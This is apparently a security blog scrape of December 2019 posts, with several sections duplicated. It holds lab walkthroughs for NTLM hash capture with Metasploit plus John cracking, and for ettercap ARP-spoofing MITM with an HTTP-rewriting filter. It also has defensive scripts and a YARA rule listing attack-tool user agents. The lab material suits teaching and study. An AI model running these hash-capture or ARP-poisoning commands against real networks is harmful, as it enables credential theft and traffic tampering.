create 2 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup both virtualbox Network tab to use "Internal Network" and the same name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module
> msfconsole
msf> use auxillary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt
exploit
7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
\\169.254.18.2\
windows will popup an authentication prompt, enter a user & password (e.g. guy, password)
8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to \tmp\john.txt
type exit to exit metasploit
run john against the newly captured file
> john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt
if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen
Friday, December 27, 2019
compare dhcp leases to active directory pcs
python script
# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
# Get-ADComputer -Filter * |select name > ad.csv
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
notInADCount = 0
searchedCount = 0
for dhcpHost in dhcpFileHandle:
foundIt = 0
with open(adFile, 'r') as adFileHandle:
for adHost in adFileHandle:
adHost = adHost.lower().strip()
dhcpHost = dhcpHost.lower().strip()
if dhcpHost == adHost:
foundIt = 1
break
searchedCount = searchedCount + 1
if foundIt == 0:
print(dhcpHost, end='', file=notInADHandle)
notInADCount = notInADCount + 1
print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))
# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
# Get-ADComputer -Filter * |select name > ad.csv
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
notInADCount = 0
searchedCount = 0
for dhcpHost in dhcpFileHandle:
foundIt = 0
with open(adFile, 'r') as adFileHandle:
for adHost in adFileHandle:
adHost = adHost.lower().strip()
dhcpHost = dhcpHost.lower().strip()
if dhcpHost == adHost:
foundIt = 1
break
searchedCount = searchedCount + 1
if foundIt == 0:
print(dhcpHost, end='', file=notInADHandle)
notInADCount = notInADCount + 1
print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))
ettercap http replace man-in-the-middle full example
create 3 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
will be hosting the website the victim wants to access
3.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
then launch python simple http server on port 8001
python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
http://169.254.18.2:8001/
you will see the text
"this is fun"
9.) on kali linux ATTACKER
create an ettercap filter file with a text editor with this content and save as "fun.filter"
if (ip.proto == TCP) {
if (tcp.dst == 8001 || tcp.src == 8001) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
msg("removed encoding");
}
if (search(DATA.data, "fun")) {
replace("fun", "evil");
msg("fun is now evil");
}
}
}
NOTE: above the accept-encoding removal is important otherwise the html is gzip encoded and not clear text so your replace won't work and the src/dst port is important so you catch request and response
next compile the filter
etterfilter fun.filter -o fun.ef
next run ettercap using the filter and arp spoofing
ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
reload the website
http://169.254.18.2:8001/
you will now see the text
"this is evil"
11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
will be hosting the website the victim wants to access
3.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
then launch python simple http server on port 8001
python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
http://169.254.18.2:8001/
you will see the text
"this is fun"
9.) on kali linux ATTACKER
create an ettercap filter file with a text editor with this content and save as "fun.filter"
if (ip.proto == TCP) {
if (tcp.dst == 8001 || tcp.src == 8001) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
msg("removed encoding");
}
if (search(DATA.data, "fun")) {
replace("fun", "evil");
msg("fun is now evil");
}
}
}
NOTE: above the accept-encoding removal is important otherwise the html is gzip encoded and not clear text so your replace won't work and the src/dst port is important so you catch request and response
next compile the filter
etterfilter fun.filter -o fun.ef
next run ettercap using the filter and arp spoofing
ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
reload the website
http://169.254.18.2:8001/
you will now see the text
"this is evil"
11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
Monday, December 23, 2019
navigator DOM keys
document.write("navigator.appName = " + navigator.appName + "<br/>")
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>")
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>")
document.write("navigator.platform = " + navigator.platform + "<br/>")
document.write("navigator.vendor = " + navigator.vendor + "<br/>")
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");
-----------------
sample output
-----------------
Google Chrome on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107
-----------------
Internet Explorer on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
-----------------
Microsoft Edge on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub =
-----------------
FireFox ESR on 64bit Kali Linux
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor =
navigator.vendorSub =
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>")
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>")
document.write("navigator.platform = " + navigator.platform + "<br/>")
document.write("navigator.vendor = " + navigator.vendor + "<br/>")
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");
sample output
-----------------
Google Chrome on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107
-----------------
Internet Explorer on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
-----------------
Microsoft Edge on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub =
-----------------
FireFox ESR on 64bit Kali Linux
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor =
navigator.vendorSub =
Friday, December 20, 2019
Virtual Box local contained lab, VM to VM
network for both kali & windows
"internal network"
on kali type
ifconfig eth0 169.254.18.XXX netmask 255.255.0.0 up
on kali
ping windows
on windows
ping kali
"internal network"
on kali type
ifconfig eth0 169.254.18.XXX netmask 255.255.0.0 up
on kali
ping windows
on windows
ping kali
Thursday, December 5, 2019
yaraOneLiner.py
# Run Yara Rules against a file ONE LINE AT A TIME instead of against the whole file
import os
import subprocess
import traceback
import argparse
import sys
yaraParams = "-s"
tempFileName = "yaraOneLiner.tmp"
lineNumber = 1
output = ""
arguments = argparse.ArgumentParser("yaraOneLine.py -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()
with open(settings.inputFileName, "r") as lines:
for line in lines:
line = line.rstrip()
if settings.debug:
print("\r\n---\r\nLINE %s: %s" % (str(lineNumber) , line))
if settings.status:
if (lineNumber % 50) == 0 and lineNumber != 0:
print("STATUS: processing line %s" % (str(lineNumber)))
with open(tempFileName,"w") as tempfile:
tempfile.write(line)
try:
yaraCommand = ("%s %s %s %s" % (settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName))
if settings.debug:
print("ABOUT TO RUN: %s" % yaraCommand)
if settings.debug:
pause = input()
if settings.debug:
print("STARTED: YARA")
output = subprocess.check_output(yaraCommand, shell=True)
if settings.debug:
print("OUTPUT: %s" % str(output))
except Exception as e:
error = str(e)
print("COMMAND: %s" % yaraCommand)
print("OUTPUT: %s" % output)
print("ERROR: %s" % error)
output = ""
if output is None or len(output) == 0:
if settings.debug:
print("MATCHES: 0 (no output)")
else:
output = str(output).replace("b'","").rstrip()
if output[-1:] == "'":
output = output[:-1]
if tempFileName in output:
if settings.debug:
print("MATCHES: 1+")
print("MATCH LINE NUMBER %s:" % str(lineNumber))
print(" LINE: %s" + line)
print(" YARA:")
for row in output.split("\\r\\n"):
row = row.replace("\\r\\n", "")
if row.startswith("0x"):
print(" %s" % row)
else:
print(" %s" % row)
else:
print("MATCHES: 0 (with output)")
lineNumber = lineNumber + 1
import os
import subprocess
import traceback
import argparse
import sys
yaraParams = "-s"
tempFileName = "yaraOneLiner.tmp"
lineNumber = 1
output = ""
arguments = argparse.ArgumentParser("yaraOneLine.py -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()
with open(settings.inputFileName, "r") as lines:
for line in lines:
line = line.rstrip()
if settings.debug:
print("\r\n---\r\nLINE %s: %s" % (str(lineNumber) , line))
if settings.status:
if (lineNumber % 50) == 0 and lineNumber != 0:
print("STATUS: processing line %s" % (str(lineNumber)))
with open(tempFileName,"w") as tempfile:
tempfile.write(line)
try:
yaraCommand = ("%s %s %s %s" % (settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName))
if settings.debug:
print("ABOUT TO RUN: %s" % yaraCommand)
if settings.debug:
pause = input()
if settings.debug:
print("STARTED: YARA")
output = subprocess.check_output(yaraCommand, shell=True)
if settings.debug:
print("OUTPUT: %s" % str(output))
except Exception as e:
error = str(e)
print("COMMAND: %s" % yaraCommand)
print("OUTPUT: %s" % output)
print("ERROR: %s" % error)
output = ""
if output is None or len(output) == 0:
if settings.debug:
print("MATCHES: 0 (no output)")
else:
output = str(output).replace("b'","").rstrip()
if output[-1:] == "'":
output = output[:-1]
if tempFileName in output:
if settings.debug:
print("MATCHES: 1+")
print("MATCH LINE NUMBER %s:" % str(lineNumber))
print(" LINE: %s" + line)
print(" YARA:")
for row in output.split("\\r\\n"):
row = row.replace("\\r\\n", "")
if row.startswith("0x"):
print(" %s" % row)
else:
print(" %s" % row)
else:
print("MATCHES: 0 (with output)")
lineNumber = lineNumber + 1
Neo23x0 Sigma Proxy Rules converted to simple Yara
rule Neo23x0SigmaUserAgentMatch
{
meta:
author = "@neonprimetime"
description = "@Neo23x0 Proxy User Agent Rules https://github.com/Neo23x0/sigma/tree/master/rules/proxy"
strings:
$string1 = "(compatible;MSIE"
$string2 = "BFAC"
$string3 = "BGroom"
$string4 = "CholTBAgent"
$string5 = "Havij"
$string7 = "adlib/"
$string8 = "arachni/"
$string9 = "asd"
$string10 = "brutus"
$string11 = "cgichk"
$string12 = "changhuatong"
$string13 = "crimscanner/"
$string14 = "inspath"
$string15 = "mdms"
$string16 = "metis"
$string17 = "pxyscand"
$string18 = "tiny"
$string19 = "vega/"
$string20 = "whcc/"
$string21 = "zmeu"
$string22 = "(Charon; Inferno)"
$string23 = "(hydra)"
$string24 = ".0;Windows NT"
$string25 = "<|>"
$string26 = "Bot"
$string27 = "Microsoft Internet Explorer"
$string28 = "Telegram"
$string29 = "absinthe"
$string30 = "bsqlbf"
$string31 = "core-project/1.0"
$string32 = "datacha0s"
$string33 = "dirbuster"
$string34 = "domino hunter"
$string35 = "dotdotpwn"
$string36 = "exploit"
$string37 = "floodgate"
$string38 = "get-minimal"
$string39 = "gootkit auto-rooter scanner"
$string40 = "grendel-scan"
$string41 = "internet ninja"
$string42 = "jaascois"
$string43 = "masscan"
$string44 = "morfeus fucking scanner"
$string45 = "mysqloit"
$string46 = "n-stealth"
$string47 = "nsauditor"
$string48 = "pangolin"
$string49 = "pmafind"
$string50 = "security scan"
$string51 = "springenwerk"
$string52 = "sql power injector"
$string53 = "sqlmap"
$string54 = "sqlninja"
$string55 = "teh forest lobster"
$string56 = "toata dragostea"
$string57 = "uil2pn"
$string58 = "voideye"
$string59 = "webshag"
$string60 = "webvulnscan"
$string61 = "wordpress hash grabber"
$string62 = "zeroup"
$string63 = "AutoIt"
$string64 = "CertUtil URL Agent"
$string65 = "DotDotPwn v2.1"
$string66 = "FHScan Core"
$string67 = "HttpBrowser/1.0"
$string68 = "IczelionDownLoad"
$string69 = "Internet Explorer"
$string75 = "Moxilla"
$string78 = "Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
$string79 = "Mozilla v5.1"
$string80 = "Mozilla/1.0"
$string81 = "Mozilla/2.0"
$string83 = "Mozilla/4.0 (compatible; MSI 6.0;"
$string84 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)"
$string85 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
$string86 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
$string87 = "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"
$string88 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
$string89 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
$string90 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
$string91 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
$string92 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string93 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string94 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
$string95 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
$string96 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR = {7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N"
$string97 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
$string98 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)"
$string99 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
$string100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)"
$string101 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
$string102 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
$string103 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
$string104 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
$string105 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
$string106 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)"
$string107 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)"
$string108 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)"
$string109 = "Mozilla/4.0 (compatible; Metasploit RSPEC)"
$string110 = "Mozilla/4.0 (compatible; RMS)"
$string111 = "Mozilla/4.0 (compatible; SPIPE/1.0"
$string112 = "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)"
$string114 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)"
$string115 = "Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)"
$string117 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)"
$string118 = "Mozilla/5.0 (Windows NT 5.1 ; v."
$string119 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
$string120 = "Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko"
$string121 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0"
$string122 = "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/"
$string123 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string124 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string125 = "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0"
$string126 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2"
$string127 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"
$string128 = "Mozilla/5.0 (Windows NT 9;"
$string129 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"
$string130 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1"
$string131 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)"
$string132 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)"
$string133 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
$string134 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200"
$string135 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7"
$string136 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
$string137 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0"
$string138 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
$string139 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)"
$string140 = "Mozilla/5.0 WinInet"
$string142 = "Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)"
$string143 = "Netscape"
$string144 = "O/9.27 (W; U; Z)"
$string146 = "Opera/8.81 (Windows NT 6.0; U; en)"
$string147 = "RookIE/1.0"
$string148 = "SIPDROID"
$string149 = "SJZJ (compatible; MSIE 6.0; Win32)"
$string150 = "Sametime Community Agent"
$string151 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC"
$string152 = "Wget/1.9+cvs-stable (Red Hat modified)"
$string154 = "X-FORWARDED-FOR"
$string155 = "XMRig"
$string157 = "backdoorbot"
$string158 = "ccminer"
$string159 = "hots scot"
$string160 = "nocase"
$string161 = "nsis_inetc (mozilla)"
$string162 = "ruler"
$string163 = "sample"
$string164 = "user-agent"
condition:
1 of them
}
{
meta:
author = "@neonprimetime"
description = "@Neo23x0 Proxy User Agent Rules https://github.com/Neo23x0/sigma/tree/master/rules/proxy"
strings:
$string1 = "(compatible;MSIE"
$string2 = "BFAC"
$string3 = "BGroom"
$string4 = "CholTBAgent"
$string5 = "Havij"
$string7 = "adlib/"
$string8 = "arachni/"
$string9 = "asd"
$string10 = "brutus"
$string11 = "cgichk"
$string12 = "changhuatong"
$string13 = "crimscanner/"
$string14 = "inspath"
$string15 = "mdms"
$string16 = "metis"
$string17 = "pxyscand"
$string18 = "tiny"
$string19 = "vega/"
$string20 = "whcc/"
$string21 = "zmeu"
$string22 = "(Charon; Inferno)"
$string23 = "(hydra)"
$string24 = ".0;Windows NT"
$string25 = "<|>"
$string26 = "Bot"
$string27 = "Microsoft Internet Explorer"
$string28 = "Telegram"
$string29 = "absinthe"
$string30 = "bsqlbf"
$string31 = "core-project/1.0"
$string32 = "datacha0s"
$string33 = "dirbuster"
$string34 = "domino hunter"
$string35 = "dotdotpwn"
$string36 = "exploit"
$string37 = "floodgate"
$string38 = "get-minimal"
$string39 = "gootkit auto-rooter scanner"
$string40 = "grendel-scan"
$string41 = "internet ninja"
$string42 = "jaascois"
$string43 = "masscan"
$string44 = "morfeus fucking scanner"
$string45 = "mysqloit"
$string46 = "n-stealth"
$string47 = "nsauditor"
$string48 = "pangolin"
$string49 = "pmafind"
$string50 = "security scan"
$string51 = "springenwerk"
$string52 = "sql power injector"
$string53 = "sqlmap"
$string54 = "sqlninja"
$string55 = "teh forest lobster"
$string56 = "toata dragostea"
$string57 = "uil2pn"
$string58 = "voideye"
$string59 = "webshag"
$string60 = "webvulnscan"
$string61 = "wordpress hash grabber"
$string62 = "zeroup"
$string63 = "AutoIt"
$string64 = "CertUtil URL Agent"
$string65 = "DotDotPwn v2.1"
$string66 = "FHScan Core"
$string67 = "HttpBrowser/1.0"
$string68 = "IczelionDownLoad"
$string69 = "Internet Explorer"
$string75 = "Moxilla"
$string78 = "Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
$string79 = "Mozilla v5.1"
$string80 = "Mozilla/1.0"
$string81 = "Mozilla/2.0"
$string83 = "Mozilla/4.0 (compatible; MSI 6.0;"
$string84 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)"
$string85 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
$string86 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
$string87 = "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"
$string88 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
$string89 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
$string90 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
$string91 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
$string92 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string93 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string94 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
$string95 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
$string96 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR = {7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N"
$string97 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
$string98 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)"
$string99 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
$string100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)"
$string101 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
$string102 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
$string103 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
$string104 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
$string105 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
$string106 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)"
$string107 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)"
$string108 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)"
$string109 = "Mozilla/4.0 (compatible; Metasploit RSPEC)"
$string110 = "Mozilla/4.0 (compatible; RMS)"
$string111 = "Mozilla/4.0 (compatible; SPIPE/1.0"
$string112 = "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)"
$string114 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)"
$string115 = "Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)"
$string117 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)"
$string118 = "Mozilla/5.0 (Windows NT 5.1 ; v."
$string119 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
$string120 = "Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko"
